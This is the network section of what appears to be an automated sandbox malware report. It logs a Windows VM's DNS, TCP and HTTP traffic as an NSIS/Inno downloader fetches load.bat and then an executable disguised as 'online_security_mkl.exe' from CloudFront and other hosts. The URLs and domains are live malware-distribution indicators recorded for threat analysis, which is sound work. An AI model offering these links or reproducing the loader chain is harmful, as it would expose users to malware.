Network Analysis
TCP Requests

Source | Destination | Host |
---|---|---|
192.168.56.101:49172 | 104.21.11.117:443 | cdn-edge-node.com |
192.168.56.101:49180 | 104.21.43.83:443 | adblock2024.shop |
192.168.56.101:49182 | 121.254.136.9:80 | apps.identrust.com |
192.168.56.101:49167 | 13.225.110.102:443 | d22hce23hy1ej9.cloudfront.net |
192.168.56.101:49171 | 13.225.110.102:443 | d22hce23hy1ej9.cloudfront.net |
192.168.56.101:49181 | 13.225.110.102:443 | d22hce23hy1ej9.cloudfront.net |
192.168.56.101:49163 | 18.64.13.155:443 | d2csnxzxwctx26.cloudfront.net |
192.168.56.101:49183 | 94.156.35.76:80 | 240429000936002.mjt.kqri92.top |
UDP Requests

Source | Destination |
---|---|
192.168.56.101:53004 | 164.124.101.2:53 |
192.168.56.101:53850 | 164.124.101.2:53 |
192.168.56.101:54148 | 164.124.101.2:53 |
192.168.56.101:55146 | 164.124.101.2:53 |
192.168.56.101:59002 | 164.124.101.2:53 |
192.168.56.101:61950 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:61953 | 239.255.255.250:1900 |
192.168.56.103:137 | 192.168.56.101:137 |

HTTP Requests
GET 200 https://d2csnxzxwctx26.cloudfront.net/load/load.php?c=1002

Request:
GET /load/load.php?c=1002 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2csnxzxwctx26.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Sun, 19 May 2024 01:32:31 GMT
X-Powered-By: PHP/5.5.38
Content-Description: File Transfer
Content-Disposition: attachment; filename="load.bat"
X-Cache: Miss from cloudfront
Via: 1.1 88978ba000ab6fbb0841a728290a8442.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ICN57-P2
X-Amz-Cf-Id: nDs2jdV9bksewfmMrdxg_QYciUwEJ9gJaAy_ubLxkBmXRZK0_0Drgw==
GET 200 https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Request:
GET /load/th.php?a=2836&c=1002 HTTP/1.1
Host: d22hce23hy1ej9.cloudfront.net
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Sun, 19 May 2024 01:32:34 GMT
X-Powered-By: PHP/5.5.38
X-Cache: Miss from cloudfront
Via: 1.1 da2c164b1f4a215d9eb34f9c8a35ee3c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ICN54-C1
X-Amz-Cf-Id: eRC4TPpNTEBifFsQGYBxgoM2Tr0Q9VFIba448kfYPRoPiKXQV7X_QQ==
GET 302 https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002

Request:
GET /load/dl.php?id=458&c=1002 HTTP/1.1
Host: d22hce23hy1ej9.cloudfront.net
Connection: Keep-Alive

Response:
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Sun, 19 May 2024 01:32:36 GMT
X-Powered-By: PHP/5.5.38
Location: https://cdn-edge-node.com/online_security_mkl.exe
X-Cache: Miss from cloudfront
Via: 1.1 476f8319bb51299b893d2257510c5dd0.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ICN54-C1
X-Amz-Cf-Id: rehLwNMLFDcCwgSxGmE6AwNQuDkXxrWTYFXYU06fQ1wzz7Bsd9s5xg==
GET 200 https://cdn-edge-node.com/online_security_mkl.exe

Request:
GET /online_security_mkl.exe HTTP/1.1
Host: cdn-edge-node.com
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Date: Sun, 19 May 2024 01:32:36 GMT
Content-Type: application/octet-stream
Content-Length: 3711543
Connection: keep-alive
Last-Modified: Fri, 26 Apr 2024 08:50:55 GMT
ETag: "662b6aef-38a237"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 2218
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5vfBNWpA8%2BLMsHhaFAjpGz9dpYpl8YeMVEtGm0gqJ09YVtkiyy0MgoEIyO%2Fo3FvOSLT4n7tpRi%2B3Jjf%2FS0tvkN3Rjd0ClTISPzMXKy%2B0kHhADRuFvTDQW49BBysHlA%2F9NMIvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88605589bcd52f15-LAX
alt-svc: h3=":443"; ma=86400
GET 302 https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002

Request:
GET /load/dl.php?id=444&c=1002 HTTP/1.1
User-Agent: InnoDownloadPlugin/1.5
Host: d22hce23hy1ej9.cloudfront.net
Connection: Keep-Alive

Response:
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx/1.10.1
Date: Sun, 19 May 2024 01:32:39 GMT
X-Powered-By: PHP/5.5.38
Location: http://240429000936002.mjt.kqri92.top/f/fvgbm0428902.txt
X-Cache: Miss from cloudfront
Via: 1.1 fbb22360028e181171037fd6d6a9e41c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ICN54-C1
X-Amz-Cf-Id: ZhGnKi5GqoENYdt4ZR99qOI4hwDIsGtPoRAFXUT5LsOSz86PAnrSJQ==
GET 200 http://apps.identrust.com/roots/dstrootcax3.p7c

Request:
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

Response:
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Sun, 19 May 2024 02:32:39 GMT
Date: Sun, 19 May 2024 01:32:39 GMT
Connection: keep-alive
GET 404 http://240429000936002.mjt.kqri92.top/f/fvgbm0428902.txt

Request:
GET /f/fvgbm0428902.txt HTTP/1.1
User-Agent: InnoDownloadPlugin/1.5
Host: 240429000936002.mjt.kqri92.top
Connection: Keep-Alive

Response:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Caddy
Status: 404 Not Found
X-Powered-By: PHP/7.3.25
Date: Sun, 19 May 2024 01:32:41 GMT
Content-Length: 17
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49172 → 104.21.11.117:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=cdn-edge-node.com | 91:0f:27:57:ee:98:f8:5f:d5:7c:7c:6c:88:dd:0b:40:d7:4a:45:06 |
TLSv1 192.168.56.101:49163 → 18.64.13.155:443 | C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.101:49167 → 13.225.110.102:443 | C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.101:49171 → 13.225.110.102:443 | C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.101:49181 → 13.225.110.102:443 | C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.101:49180 → 104.21.43.83:443 | C=US, O=Let's Encrypt, CN=E1 | CN=adblock2024.shop | f6:53:16:b6:98:89:7a:ae:57:00:89:be:e1:b6:81:59:8e:db:ed:ab |
Snort Alerts
No Snort Alerts